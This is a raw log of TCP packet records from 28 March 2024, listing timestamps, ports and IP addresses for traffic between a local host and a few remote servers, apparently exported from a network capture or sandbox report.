Mar 28, 2024 09:15:00.366070032 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.366087914 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.366168976 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.366205931 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.366228104 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.366930962 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.366962910 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.366986990 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.367158890 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.367677927 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.367737055 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.368225098 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.368340015 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.368349075 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.368429899 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.368444920 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.368458986 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.368515015 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.369107962 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.369122982 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.369146109 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.369163990 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.369200945 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.369201899 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.369647980 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.369916916 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.369954109 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.369995117 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.369996071 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.370059013 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.370069027 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.370107889 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.370107889 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.370471001 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.370542049 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.370789051 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.370803118 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.370826960 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.371107101 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.371124029 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.371126890 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.371339083 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.371381044 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.371387959 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.371668100 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.371974945 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.372051954 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.372092009 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.372104883 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.372134924 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.372136116 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.372792959 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.372801065 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.372843981 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.372844934 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.372936010 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.372958899 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.373153925 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.373172998 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.373193979 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.373645067 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.373702049 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.373718977 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.373884916 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.373927116 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.373948097 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.374346018 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.374373913 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.374408960 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.374514103 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.374633074 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.374649048 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.375029087 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.375047922 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.375067949 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.375344992 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.375363111 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.375384092 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.375782967 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.375816107 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.375824928 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.376214981 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.376231909 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.376250029 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.376636982 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.376714945 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.376724005 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.376744986 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.376776934 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.376777887 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.376780033 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.376823902 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.376823902 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.377343893 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.377432108 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.377461910 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.377465010 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.377485991 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.377513885 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.377515078 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.377583027 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.378067017 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.378074884 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.378262997 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.378333092 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.378370047 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.378417015 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.378936052 CET	443	49769	52.216.219.33	192.168.2.4
Mar 28, 2024 09:15:00.378957033 CET	443	49769	52.216.219.33	192.168.2.4
Mar 28, 2024 09:15:00.378971100 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.378995895 CET	443	49769	52.216.219.33	192.168.2.4
Mar 28, 2024 09:15:00.379024029 CET	49769	443	192.168.2.4	52.216.219.33
Mar 28, 2024 09:15:00.379033089 CET	443	49769	52.216.219.33	192.168.2.4
Mar 28, 2024 09:15:00.379045963 CET	49769	443	192.168.2.4	52.216.219.33
Mar 28, 2024 09:15:00.379045963 CET	49769	443	192.168.2.4	52.216.219.33
Mar 28, 2024 09:15:00.379338980 CET	443	49769	52.216.219.33	192.168.2.4
Mar 28, 2024 09:15:00.379360914 CET	443	49769	52.216.219.33	192.168.2.4
Mar 28, 2024 09:15:00.379375935 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.379384041 CET	49769	443	192.168.2.4	52.216.219.33
Mar 28, 2024 09:15:00.379390955 CET	443	49769	52.216.219.33	192.168.2.4
Mar 28, 2024 09:15:00.379410982 CET	49769	443	192.168.2.4	52.216.219.33
Mar 28, 2024 09:15:00.379442930 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.379442930 CET	49769	443	192.168.2.4	52.216.219.33
Mar 28, 2024 09:15:00.379447937 CET	443	49769	52.216.219.33	192.168.2.4
Mar 28, 2024 09:15:00.379489899 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.379538059 CET	49769	443	192.168.2.4	52.216.219.33
Mar 28, 2024 09:15:00.379547119 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.379580975 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.379627943 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.379628897 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.379820108 CET	443	49769	52.216.219.33	192.168.2.4
Mar 28, 2024 09:15:00.379833937 CET	443	49769	52.216.219.33	192.168.2.4
Mar 28, 2024 09:15:00.379873991 CET	443	49769	52.216.219.33	192.168.2.4
Mar 28, 2024 09:15:00.379889965 CET	49769	443	192.168.2.4	52.216.219.33
Mar 28, 2024 09:15:00.379895926 CET	443	49769	52.216.219.33	192.168.2.4
Mar 28, 2024 09:15:00.379915953 CET	49769	443	192.168.2.4	52.216.219.33
Mar 28, 2024 09:15:00.379971027 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.379978895 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.380000114 CET	49769	443	192.168.2.4	52.216.219.33
Mar 28, 2024 09:15:00.380027056 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.380065918 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.380065918 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.380192041 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.380192995 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.380199909 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.380364895 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.380390882 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.380436897 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.381074905 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.381144047 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.381190062 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.381205082 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.381206989 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.381252050 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.381278992 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.381311893 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.381321907 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.381501913 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.381649017 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.381696939 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.381752968 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.381761074 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.381805897 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.381807089 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.381809950 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.382560968 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.382582903 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.382683992 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.382688999 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.382698059 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.382740021 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.382740974 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.382994890 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.383018970 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.383086920 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.383316040 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.383361101 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.383416891 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.383418083 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.383506060 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.383692980 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.383723974 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.383878946 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.383887053 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.383910894 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.384561062 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.384569883 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.384593010 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.384955883 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.385210991 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.385211945 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.385260105 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.385301113 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.385302067 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.385354042 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.385457039 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.385463953 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.385510921 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.385512114 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.385924101 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.385966063 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.386436939 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.386445999 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.386524916 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.386527061 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.386759996 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.386766911 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.386843920 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.386876106 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.386889935 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.386977911 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.387245893 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.387253046 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.387622118 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.387630939 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.387676954 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.387677908 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.388106108 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.388113022 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.388376951 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.388386011 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.388406992 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.388565063 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.388609886 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.388654947 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.389092922 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.389101028 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.389122963 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.389180899 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.389292002 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.389324903 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.389363050 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.389414072 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.389839888 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.389848948 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.390449047 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.390456915 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.390485048 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.390602112 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.390609026 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.390633106 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.390697956 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.390736103 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.390738964 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.391663074 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.391675949 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.391715050 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.391726971 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.391735077 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.391746998 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.391843081 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.391968012 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.391983032 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.392071962 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.392103910 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.392111063 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.393003941 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.393012047 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.393024921 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.393032074 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.393069983 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.393070936 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.393083096 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.393484116 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.393522978 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.393523932 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.393578053 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.393599987 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.393621922 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.393647909 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.394269943 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.394278049 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.394345045 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.394352913 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.394375086 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.394622087 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.394993067 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.395019054 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.395436049 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.395462990 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.395464897 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.395657063 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.395684004 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.395684004 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.395735025 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.395777941 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.395778894 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.395778894 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.396637917 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.396645069 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.396682978 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.396683931 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.396712065 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.396752119 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.396984100 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.397001028 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.397007942 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.397033930 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.397034883 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.397078037 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.397128105 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.397167921 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.397173882 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.397243977 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.397754908 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.397769928 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.397833109 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.398025036 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.398041964 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.398680925 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.398710012 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.398715019 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.398776054 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.398828030 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.398828030 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.398963928 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.399020910 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.399022102 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.399069071 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.399235010 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.399283886 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.399285078 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.399285078 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.399451971 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.399475098 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.399528027 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.399569988 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.399584055 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.399594069 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.399611950 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.399619102 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.399622917 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.399635077 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.399679899 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.399774075 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.399780989 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.399797916 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.399838924 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.399844885 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.399844885 CET	49739	80	192.168.2.4	193.233.132.139
